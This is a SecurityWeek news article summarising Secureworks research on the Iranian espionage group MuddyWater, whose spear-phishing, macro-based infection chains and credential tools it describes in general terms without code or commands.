Connect with us

Hi, what are you looking for?



Iranian Cyberspies Focus on Long-Running Operations

The Iranian cyber-espionage group referred to as MuddyWater continues to focus on long-running operations even after a U.S. airstrike killed General Qassem Soleimani on January 2.

The Iranian cyber-espionage group referred to as MuddyWater continues to focus on long-running operations even after a U.S. airstrike killed General Qassem Soleimani on January 2.

Soleimani was the leader of Quds Force, an elite unit of the Iranian Revolutionary Guards, and his death resulted in escalated tensions between the United States and Iran, yet there have been no reports of cyber-attacks launched in retaliation.

Cyber-retaliation continues to be a probability, and even industrial systems might be at risk, but for now Iranian threat groups appear to focus on their long-running cyber-espionage activity instead, Secureworks’ security researchers say.

“Although there was ballistic missile bombardment of U.S. military personnel in Iraq […], no government-directed cyber retaliation has been observed as of this publication,” the security firm notes in a new report.

Looking into the activity associated with Iran-linked hackers, Secureworks observed that most operations commenced prior to the U.S. drone strike. The campaigns were conducted by MuddyWater, a threat group that is also referred to as COBALT ULSTER, Seedworm, TEMP.Zagros, and Static Kitten.

Active since at least 2017, the group was observed mainly targeting entities in the Middle East and the United States with spear-phishing attacks, and has evolved its toolset and tactics to avoid detection.

Between mid-2019 and mid-January 2020, the threat actor launched numerous spear-phishing attacks on governmental organizations in Turkey, Jordan, and Iraq, and also targeted global intergovernmental organizations and unknown entities in Georgia and Azerbaijan.

Advertisement. Scroll to continue reading.

In one attack, the hackers sent numerous spear-phishing emails carrying malicious attachments, with some emails containing a link to a compromised site.

One of the infection chains featured Excel documents used with a malicious VBScript macro that would drop the legitimate wscript.exe binary, achieve persistence, and eventually fetch a second-stage PowerShell designed to download additional payloads from a hardcoded IP address.

A second infection chain employed Excel files with an obfuscated macro designed to drop and execute a previously unobserved remote access Trojan (RAT). Referred to as ForeLord, the malware uses DNS tunneling.

The threat actor deployed several tools onto the compromised host, to collect and test credentials, and create a reverse SSL tunnel for expanded access to the network. These include PasswordDumper, a Mimikatz variant named Caller.dll, and open-source tools CredNinja for credential testing, and Secure Socket Funneling for TCP and UDP port forwarding.

Many of the attacks MuddyWater launched over the past couple of years started with the collection of credentials via social engineering, phishing, password spraying, brute-force attacks, and exploitation of publicly available systems, the security researchers say.

“Although Iran has not launched a cyber-retaliation for Soleimani’s death as of this publication, CTU researchers acknowledge that planning and coordinating for a response takes time. Iran has destructive and disruptive capabilities that it has historically employed for retaliatory purposes against organizations. In some cases, these responses materialized several months after provocations toward Iran occurred. However, Iran’s cyberespionage operations continue,” Secureworks concludes.

Related: “MuddyWater” Cyberspies Update PowerShell Backdoor

Related: Targeted Phishing Campaign Leverages Death of Iranian General Qasem Suleimani

Related: Iran-Linked ZeroCleare Wiper Targets Energy, Industrial Sectors in Middle East

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join security experts as they discuss ZTNA’s untapped potential to both reduce cyber risk and empower the business.


Join Microsoft and Finite State for a webinar that will introduce a new strategy for securing the software supply chain.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.


WASHINGTON - Cyberattacks are the most serious threat facing the United States, even more so than terrorism, according to American defense experts. Almost half...


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.